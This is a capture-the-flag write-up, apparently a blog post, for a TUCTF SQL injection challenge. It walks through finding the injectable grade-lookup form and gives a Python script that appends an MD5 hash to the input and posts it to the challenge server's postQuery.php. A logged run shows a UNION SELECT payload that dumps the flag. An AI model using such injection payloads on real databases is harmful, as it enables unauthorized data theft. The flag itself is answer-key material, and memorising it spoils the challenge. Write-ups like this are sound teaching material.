Descriptions:
Solution:We are trying to find out what our grade was, but we don't seem to be in the database...Can you help us out?http://104.199.151.39/index.html
1. "in the database..." on description make me sure, It about SQL Injection.
2. Index page have a input of name that want to show grade.
3. View source in index.html and get some script.
4. In line 46 is vulnerable to SQL Injection but in line 50 means the data will send with md5 to postQuery.php by ajax.
5. In Response tab, I found some comment that tell me a SQL query statement.
6. Write a python script to get data in each step, Found Database: tuctf, Tables: tuctf_grades, tuctf_info, tuctf_junk Columns: item, value and Flag store in tuctf_info.
7. select value from tuctf_info
Python Script:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author: Kitwipat Towattana (@icheernoom) | |
| import requests, hashlib, sys | |
| url = 'http://104.199.151.39/postQuery.php' | |
| inp_str = sys.argv[1] | |
| md5_str = hashlib.md5("{0}".format(inp_str)).hexdigest() | |
| send_str = inp_str+' '+md5_str | |
| data = {'name': send_str, 'submit':1} | |
| content = requests.post(url, data=data).content | |
| print "{0}".format(content) | |
| ''' | |
| root@kali:~/Desktop# python grade.py "xyz%' union all select 1,(select value from tuctf_info);-- -" | |
| <!--HI!--><!--Good auth!--><!--SELECT * FROM tuctf_grades WHERE name LIKE '%xyz%' union all select 1,(select value from tuctf_info);-- -%';--><tr><th>Name</th><th>Grade</th></tr><tr><td>1</td><td>TUCTF{v4ccinate_y0ur_databa5e5}</td></tr> | |
| ''' |
Flag: TUCTF{v4ccinate_y0ur_databa5e5}
ไม่มีความคิดเห็น:
แสดงความคิดเห็น